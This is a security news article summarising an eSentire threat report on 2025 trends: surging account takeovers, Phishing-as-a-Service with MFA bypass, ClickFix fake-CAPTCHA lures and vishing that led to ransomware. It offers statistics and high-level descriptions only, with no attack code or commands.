The Identity Epidemic: eSentire Reports a 389% Surge in Account Takeovers

To infiltrate a corporate network, adversaries are increasingly eschewing the search for server vulnerabilities or the deployment of intricate exploits. It has proven far more lucrative to adopt a simpler, more clandestine approach: usurping an individual’s digital credentials to merely walk through the front door. According to the eSentire TRU report, digital identity emerged as the preeminent target of assaults in 2025, as cybercrime increasingly mirrors a legitimate industry characterized by turn-key services and a transparent economic structure.

The primary engine of this industrialization is the proliferation of Phishing-as-a-Service (PhaaS) platforms, which provide a comprehensive infrastructure for phishing endeavors. The report indicates that for a modest monthly subscription of $200–$300, a novice antagonist can acquire a service capable of circumventing multi-factor authentication, intercepting session tokens in real-time, and delivering compromised accounts to those poised for rapid monetization.

The magnitude of this shift is starkly evident in the eSentire TRU statistics. Account compromise accounted for half of all observations by the team, marking a staggering 389% increase compared to 2024. The authors articulate this succinctly: why endeavor to break in when one can simply log in? Simultaneously, the exploitation of remote administration tools is gaining momentum; the misuse of Remote Monitoring and Management (RMM) software saw a 143% year-over-year surge.

Researchers further observe that compromise increasingly originates via electronic correspondence. The proportion of incidents where initial access was secured through email rose from 36.9% in 2024 to 54.8% in 2025, with 63% of all account takeovers linked directly to PhaaS operations. These schemes frequently employ an Adversary-in-the-Middle (AiTM) approach, guiding the victim to a proxy login page to harvest not only passwords but active session tokens during the authentication process.

The velocity of these incursions has become a distressing new standard. In an analysis of 100 incidents involving the Tycoon2FA platform, adversaries commenced exploitation an average of fourteen minutes after the theft of credentials. In practical terms, the interval between a user entering a password and an intruder altering email forwarding rules may be briefer than a cursory departmental meeting.

Concurrently, there is a rising prevalence of attacks where the user is manipulated into executing malicious code manually. A prominent example is ClickFix (or FakeCaptcha). The report notes that in 2025, ClickFix incidents grew from 7.8% to 30.7% of all malware delivery cases—a nearly 300% year-over-year increase—with researchers documenting over 65 distinct intrusion chains utilizing this technique. The scenario typically involves fraudulent CAPTCHAs or simulated browser errors, persuading the victim to select “Fix It,” copy a command, and execute it via the Windows Run dialog or PowerShell.

Another burgeoning trend mirrors the tactics of fraudulent call centers but culminates in a technical breach. Email bombing in conjunction with “IT Support” vishing grew fourteen-fold year-over-year, becoming the fastest-growing threat category. The victim’s inbox is first inundated with spam; subsequently, an actor contacts them via Microsoft Teams, posing as technical support. Under the guise of assistance, they secure remote access. In certain instances, this chain concluded with the deployment of Black Basta ransomware, with vishing success rates estimated at an alarming 72%.

The authors’ conclusion is uncompromising: contemporary assaults move with greater celerity than traditional defenses. Organizations relying on retrospective log analysis or operating solely within standard business hours find themselves in a position of inherent weakness. Consequently, the strategic focus is shifting toward continuous identity monitoring and rapid anomalous behavior response. In an era where intruders “simply walk in,” the strength of the perimeter walls matters less than the speed at which an illegitimate session can be identified and terminated.